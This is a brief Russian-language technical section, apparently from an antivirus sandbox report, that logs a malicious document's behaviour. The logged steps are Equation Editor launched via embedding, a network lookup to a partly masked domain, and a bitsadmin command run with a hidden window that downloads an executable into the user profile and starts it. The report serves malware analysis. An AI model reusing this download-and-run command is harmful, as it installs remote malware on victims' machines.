Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer JP /priority foreground http://na###ill.com.au/profiles/xc/new/build_output81CF86F.exe %USERPROFILE%\MW.exe && start %USERPROFILE%\MW.exe
- 'na###ill.com.au':80
- DNS ASK na###ill.com.au
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer JP /priority foreground http://na###ill.com.au/profiles/xc/new/build_output81CF86F.exe %USERPROFILE%\MW.exe && start %USERPROFILE%\MW.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer JP /priority foreground http://na###ill.com.au/profiles/xc/new/build_output81CF86F.exe %HOMEPATH%\MW.exe